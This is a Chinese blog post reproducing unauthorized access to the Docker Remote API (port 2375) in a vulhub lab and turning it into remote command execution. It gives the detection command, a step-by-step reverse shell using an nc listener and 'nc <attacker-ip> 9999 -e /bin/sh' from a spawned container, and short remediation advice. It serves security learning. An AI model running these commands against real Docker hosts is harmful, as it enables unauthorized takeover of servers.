从Docker Daemon API未授权访问到RCE

最新推荐文章于 2024-05-28 14:31:24 发布
最新推荐文章于 2024-05-28 14:31:24 发布
阅读量3k 收藏
点赞数
文章标签: docker 容器 运维 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/122123287
版权

影响范围

Docker ALL 

漏洞类型

未授权访问类

利用条件

REST API外置

漏洞概述

Docker Remote API是一个取代远程命令行界面(RCLI)的REST API,当该接口直接暴漏在外网环境中且未作权限检查时,攻击者可以通过恶意调用相关的API实现远程命令执行

漏洞复现

环境搭建

下载环境

mkdir docker
cd docker 
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/Dockerfile
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-compose.yml
wget https://raw.githubusercontent.com/vulhub/vulhub/master/docker/unauthorized-rce/docker-entrypoint.sh

 之后给docker-entrypoint.sh赋予执行权限

chmod 777 docker-entrypoint.sh

 编译并启动环境

docker-compose up -d

漏洞利用

漏洞检测

docker -H tcp://192.168.17.140:2375 images

反弹shell

Step 1:在攻击者主机上监听9999端口

nc -lnvp 9999

 Step 2:查看目标系统上存在的镜像

docker -H tcp://192.168.17.140:2375 images

 

 Step 3:之后创建一个轻量级镜像

docker -H tcp://192.168.17.140:2375 run -id  alpine:latest

 Step 4:查看运行的容器信息获取对应的容器ID

docker -H tcp://192.168.17.140:2375 ps

 Step 5:进入容器并通过nc进行反弹shell

docker -H tcp://192.168.17.140:2375 exec -it cbb678549422  sh
nc 192.168.17.128 9999 -e /bin/sh

 Step 6:在攻击主机中成功接收到shell

 Step 7:退出并删除容器

exit
docker -H tcp://192.168.17.140:2375 rm cbb678549422 -f
docker -H tcp://192.168.17.140:2375 ps

修复建议

1、对2375端口做网络访问控制,例如:ACL控制

2、修改docker swarm的认证方式,使用TLS认证

FLy_鹏程万里
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Docker Remote API 授权漏洞全球探测1
08-03
漏洞发现的起因是,有一位同学在使用 docker swarm 的时候,发现了管理的 docker 节点上会开放一个 TCP 端口 2375,绑定在 0.0.0.
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接
qq_45234543的博客
11-23 2405
漏洞复现-poc-yaml-docker-unauthorized-rce-ssh认证连接,docker授权漏洞利用,ssh密钥连接
Docker|漏洞】Docker api授权导致rce
最新发布
wei的博客
05-28 696
解决docker api授权导致rce漏洞修复
docker api授权导致rce 漏洞修复
core815的专栏
05-26 1581
docker api授权导致rce 漏洞修复
漏洞复现-docker-unauthorized-rce
qq_59350385的博客
06-27 6273
一、漏洞介绍1.1漏洞成因 docker remote API授权访问漏洞,此API主要目的是取代命令执行页面,开放2375监听容器时,会调用这个API。方便docker集群管理和扩展2.2环境准备 靶机环境:192.168.xx.xxx (ubuntu) 攻击环境:192.168.xx.xxx (kali) 在靶机上使用复现漏洞环境。 vulhub官网地址:https://vulhub.org 二、漏洞检测直接输入地址 ;若能访
vluhub之docker-unauthoriun-rce复现
weixin_45006525的博客
08-07 1450
1.漏洞简介: 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url实现docker命令。 2.漏洞复现 环境介绍: 1.攻击机kali:192.168.231.128 2.靶机ubuntu:192.168.231.185 靶场搭建 (1):ubuntu下载vluhub vulhub官网地址:https://vulhub.org github下载:https://github.com/vulhub/vulh
docker授权rce+docker逃逸复现
weixin_54227009的博客
05-22 1313
这段时间跟着bnessy师傅一起打内网,跟着bnessy师傅也学到了很多有用的姿势,这里就来复现几个内网的漏洞(大佬轻喷)
DockerDocker Remote API 访问控制
01-09
Docker的远程调用 API 接口存在授权访问漏洞,至少应限制外网访问。建议使用 Socket 方式访问,监听内网 ip,docker daemon 启动方式如下: [root@localhost ~]# vim /usr/lib/systemd/system/docker.service ##...
Docker出现Cannot connect to the Docker daemon. Is the docker daemon running on this host错误解决办法
01-10
Docker出现Cannot connect to the Docker daemon. Is the docker daemon running on this host错误解决办法 发生现象: ubuntu15下,安装完Docker后,运行docker images 报错Cannot connect to the Docker daemon. ...
基于Docker的MongoDB实现授权访问的方法
09-09
主要介绍了基于Docker的MongoDB实现授权访问的方法,需要的朋友可以参考下
解决执行docker daemon命令时出错的问题
01-11
最近在工作中遇到了一个问题,在一开始执行docker daemon命令时总是会出错导致进程stop,按照网上的方法在/etc/fstab文件里添加了一行 none /sys/fs/cgroup cgroup defaults 0 0 这时Docker daemon可以起来了,...
【go-zero】docker镜像直接部署go-zero的API与RPC服务 如何实现注册发现?docker network 实现 go-zero 注册发现
CTRA®王大大技术中心
08-03 1450
【go-zero】docker镜像直接部署API与RPC服务 如何实现注册发现?docker network 实现 go-zero 注册发现
春秋云镜-【仿真场景】Unauthorized writeup
渗透测试研究中心
03-07 887
说明Unauthorized是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag,分布于不同的靶机。技术FTP、Privilege Elevation、AD CS、Kerberos、域渗透第一个flagdocker 授权通过外网...
Docker API 授权访问漏洞
qq_42383069的博客
05-09 7727
Docker API 授权访问漏洞 1、漏洞简介 在Docker的部署文档中,由于默认存在某些不安全的配置样例,导致2375管理端口对外,该授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。 2、漏洞原理 利用 Docker 节点上开放的 TCP 端口 2375 远程执行 Docker 命令,进而可获取服务器 Root 权限。 3、漏洞环境搭建 这里我们直接使用 vluhub 环境 cd vulhub/docker/una
python中的cli模块_Python rcli包_程序模块 - PyPI - Python中文网
weixin_39599081的博客
12-04 184
子命令分派要使用子命令分派生成git风格的命令行界面,您可以只需要创建子命令函数,主命令将为您自动生成。defroar():"""Usage: cat-sounds roar"""print('ROAR!')defmeow():"""Usage: cat-sounds meow"""print('Meow!')这将自动生成命令cat sounds并提供以下帮助消息:Usage:cat-sounds...
MapR命令行入门(第一部分)
danpu0978的博客
04-24 1025
Apache Hadoop社区为我们提供了很多工具,使我们可以与Hadoop分布式文件系统进行交互。 通过向我们展示一个简单易懂的界面,这些工具消除了无数机器在后台的复杂性。 hadoop fs是Hadoop入门的一个很好的工具。 hadoop fs工具集运行一个通用的文件系统用户客户端,该客户端与分布式文件系统进行交互,类似于我们与Unix文件系统进行交互的方式(但是使用的命令集非常有...
Apache NiFi API RCE 复现
weixin_51345872的博客
09-01 2595
仅供学习参考使用,任何违法事情与本人无关。
春秋云镜-Unauthorized-Writeup
qq_35607078的博客
07-12 3224
春秋云镜-Unauthorized-Writeup
云安全笔记-Docker daemon api 授权访问漏洞复现及利用
NoooEmotion的博客
02-07 1390
授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker
Docker Registry 授权访问漏洞
04-25
Docker Registry 授权访问漏洞是指攻击者可以在授权的情况下访问或者下载镜像。这种漏洞的危害性较大,因为攻击者可以使用被盗取的镜像发起攻击,造成不可预测的后果。要解决这个问题,可以通过限制访问 Docker Registry 的权限、加强密码强度,并且定期更新 Docker Registry 的软件等方式来保障安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值